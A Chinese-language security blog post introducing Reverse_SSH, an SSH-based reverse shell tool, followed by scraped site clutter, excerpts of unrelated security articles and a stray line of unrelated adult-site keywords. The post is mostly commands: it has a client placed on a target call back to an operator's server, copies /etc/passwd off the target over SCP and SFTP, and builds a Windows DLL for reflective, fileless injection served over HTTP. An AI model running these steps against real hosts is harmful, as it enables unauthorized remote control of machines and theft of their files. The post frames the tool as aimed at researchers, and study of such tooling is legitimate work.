<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Reverse_SSH:一款基于SSH的反向Shell工具

    一顆小胡椒2022-11-22 10:32:26

    關于Reverse_SSH

    Reverse_SSH上一款基于SSH的反向Shell工具,在該工具的幫助下,廣大研究人員可以使用SSH來實現反向Shell,并同時擁有下列功能:

    1、使用原生SSH語句管理和連接反向Shell;
    2、動態、本地和遠程轉發;
    3、原生SCP和SFTP實現,用于從目標獲取文件;
    4、完整功能的Windows Shell;
    5、實現了客戶端&服務器端身份驗證,以創建高信任高可用的控制通道;
    6、其他...

    工具架構

    工具安裝

    Docker安裝

    docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh
    

    手動安裝

    git clone https://github.com/NHAS/reverse_ssh
    cd reverse_ssh
    make
    cd bin/
    

    運行下列命令后即可啟動服務器:

    cp ~/.ssh/id_ed25519.pub authorized_keys
    ./server 0.0.0.0:3232
    

    工具運行

    將客戶端拷貝到目標設備中,然后讓客戶端連接服務器:

    ./client your.rssh.server.com:3232
    

    獲取工具幫助信息:

    ssh your.rssh.server.com -p 3232 help
    

    查看客戶端:

    ssh your.rssh.server.com -p 3232 ls -t
    

    連接到完整Shell:

    ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac
    

    或直接使用主機名連接:

    ssh -J your.rssh.server.com:3232 root.wombo
    

    接下來,可以開啟遠程轉發功能:

    ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo
    

    或開啟動態轉發:

    ssh -D 9050 -J your.rssh.server.com:3232 root.wombo
    

    SCP:

    scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
    

    SFTP:

    sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
    

    其他功能

    默認服務器

    可以在項目構建的時候指定一個默認服務器:

    $ RSSH_HOMESERVER=your.rssh.server.com:3232 make
    $ bin/client
    $ bin/client example.com:3232
    

    Windows DLL生成

    我們還可以將客戶端編譯成DLL,并使用類似Invoke-ReflectivePEInjection之類的工具進行加載。此時,如果你使用的是Linux系統,可以使用mingw-w64-gcc編譯器:

    CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
    

    當RSSH服務器啟用了Webserver之后,我們也可以使用下列命令進行編譯:

    ./server --webserver :3232
    ssh your.rssh.server.com -p 3232
    catcher$ link --name windows_dll --shared-object --goos windows
    http://your.rssh.server.com:3232/windows_dll
    

    這種情況適用于無文件注入的場景。

    Webhook

    RSSH服務器可以通過命令行終端接口并使用webhook命令發送原始HTTP請求。

    首先,啟用一個webhook:

    $ ssh your.rssh.server.com -p 3232
    catcher$ webhook --on http://localhost:8080/
    

    接下來,連接客戶端,并使用下列格式發送一個POST請求:

    $ nc -l -p 8080
    POST /rssh_webhook HTTP/1.1
    Host: localhost:8080
    User-Agent: Go-http-client/1.1
    Content-Length: 165
    Content-Type: application/json
    Accept-Encoding: gzip
     
    {"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%  
    

    項目地址

    Reverse_SSH:【GitHub傳送門

    參考資料

    https://www.instagram.com/smart.hedgehog.art/?
    shellssh
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    此時,如果你使用的是Linux系統,可以使用mingw-w64-gcc編譯器:CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll. 當RSSH服務器啟用了Webserver之后,我們也可以使用下列命令進行編譯:./server --webserver :3232. 這種情況適用于無文件注入的場景。WebhookRSSH服務器可以通過命令行終端接口并使用webhook命令發送原始HTTP請求。
    Reverse_SSH上一款基于SSH的反向Shell工具,在該工具的幫助下,廣大研究人員可以使用SSH來實現反向Shell
    一個新發現的規避惡意軟件利用Secure Shell加密協議進入目標系統,目的是挖掘加密貨幣并實施分布式拒絕服務攻擊。
    如果被利用,該漏洞可能允許攻擊者劫持設備的攝像頭和麥克風以監視房主。 安全實驗室 Modux 的研究人員發現了 Enabot 的 Ebo Air 智能機器人的一個缺陷,該機器人旨在娛樂您的整個家庭和寵物。根據 Modux 研究人員的發現,攻擊者可以通過利用該漏洞并監視居住者/用戶來輕松入侵智能機器人。
    安全研究人員觀察到名為 TellYouThePass 的勒索軟件家族嘗試利用最近發現的 Log4j 高危漏洞。TellYouThePass 勒索軟件家族被認為年代比較悠久且基本不活躍,在廣泛使用的 Log4j 日志框架發現漏洞之后,該勒索軟件家族再次活躍。研究人員表示,繼 Khonsari 勒索軟件之后,TellYouThePass 成為第二個被觀察到利用 Log4j 漏洞(被稱為Log4Shel
    網絡交換機充當網絡的構建模塊,促進了局域網(LAN)內的數據流。
    ESXI環境搭建和配置
    2022-05-09 13:32:39
    ESXI環境搭建和配置
    近日,負責提供安全數字化體驗的智能邊緣平臺阿卡邁技術公司(Akamai Technologies)推出了可防范網絡釣魚的全新解決方案Akamai MFA,旨在使企業能夠快速部署FIDO2多因素身份驗證(MFA),而無需部署和管理硬件安全密鑰。Akamai MFA使用智能手機應用程序將現有智能手機轉變為硬件安全密鑰,進而實現流暢的用戶體驗。
    要說哪個網絡威脅組織同時具備狡猾的社會工程學能力和靈活的網絡安全技術,那就不得不提到Muddled Libra了。由于對企業信息技術有著深入的了解,即使你的組織機構擁有完善的傳統網絡防御系統,Muddled Libra也會對你產生巨大的威脅。
    2021 年,全球因勒索軟件造成的損失預計達到 200 億美元,遠高于 2015 年的 3.25 億美元。惡意流量按照攻擊行為可歸納為以下 3 種類型。攻擊行為包括掃描探測、暴力破解等。相比按照惡意流量攻擊行為劃分,學術界更側重于根據惡意流量的內容特征、數據流特征及網絡連接行為特征等具體特征進行劃分。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类